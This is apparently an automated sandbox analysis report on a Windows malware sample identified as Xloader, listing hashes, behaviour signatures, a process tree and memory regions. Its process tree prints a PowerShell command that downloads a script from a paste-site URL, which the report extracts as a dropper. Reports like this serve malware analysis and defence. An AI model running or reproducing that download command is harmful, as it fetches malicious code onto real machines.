Analysis

  • max time kernel
    136s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    07-07-2022 12:33

General

  • Target

    38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a.exe

  • Size

    806KB

  • MD5

    2a552d3676776043ba816a122691e003

  • SHA1

    29f799ce2d6e4268603e5ca310621eda23b92bd7

  • SHA256

    38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a

  • SHA512

    55eb70369368044a654578a703e0856cdc505d2e312dd488216937ca2149f45b785610727713c713b87846f79840e0034cce7aa533fe05a37eb1911a8f331fbf

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://textbin.net/raw/a3gbusy118

Signatures

  • Xloader

    Xloader is a rebranded version of Formbook malware.

  • Xloader payload 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Program crash 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a.exe
    "C:\Users\Admin\AppData\Local\Temp\38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1636
    • C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c powershell -Command "(New-Object Net.WebClient).DownloadString('https://textbin.net/raw/a3gbusy118')"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2580
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "(New-Object Net.WebClient).DownloadString('https://textbin.net/raw/a3gbusy118')"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3584
    • C:\Users\Admin\AppData\Local\Temp\38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a.exe
      "C:\Users\Admin\AppData\Local\Temp\38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a.exe"
      2⤵
        PID:3484
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3484 -s 184
          3⤵
          • Program crash
          PID:3332
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 3484 -ip 3484
      1⤵
        PID:2568

      Network

      MITRE ATT&CK Matrix

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/1636-130-0x0000000000D90000-0x0000000000E5E000-memory.dmp
        Filesize

        824KB

      • memory/1636-131-0x0000000005D70000-0x0000000006314000-memory.dmp
        Filesize

        5.6MB

      • memory/1636-132-0x0000000005650000-0x00000000056E2000-memory.dmp
        Filesize

        584KB

      • memory/1636-133-0x00000000056F0000-0x000000000578C000-memory.dmp
        Filesize

        624KB

      • memory/1636-144-0x0000000005880000-0x000000000588A000-memory.dmp
        Filesize

        40KB

      • memory/2580-134-0x0000000000000000-mapping.dmp
      • memory/3484-147-0x0000000000700000-0x000000000072C000-memory.dmp
        Filesize

        176KB

      • memory/3484-145-0x0000000000000000-mapping.dmp
      • memory/3584-138-0x00000000052D0000-0x00000000052F2000-memory.dmp
        Filesize

        136KB

      • memory/3584-139-0x00000000059C0000-0x0000000005A26000-memory.dmp
        Filesize

        408KB

      • memory/3584-140-0x0000000005B60000-0x0000000005BC6000-memory.dmp
        Filesize

        408KB

      • memory/3584-141-0x0000000006180000-0x000000000619E000-memory.dmp
        Filesize

        120KB

      • memory/3584-143-0x0000000006670000-0x000000000668A000-memory.dmp
        Filesize

        104KB

      • memory/3584-142-0x00000000079B0000-0x000000000802A000-memory.dmp
        Filesize

        6.5MB

      • memory/3584-137-0x0000000005320000-0x0000000005948000-memory.dmp
        Filesize

        6.2MB

      • memory/3584-136-0x0000000002BA0000-0x0000000002BD6000-memory.dmp
        Filesize

        216KB

      • memory/3584-135-0x0000000000000000-mapping.dmp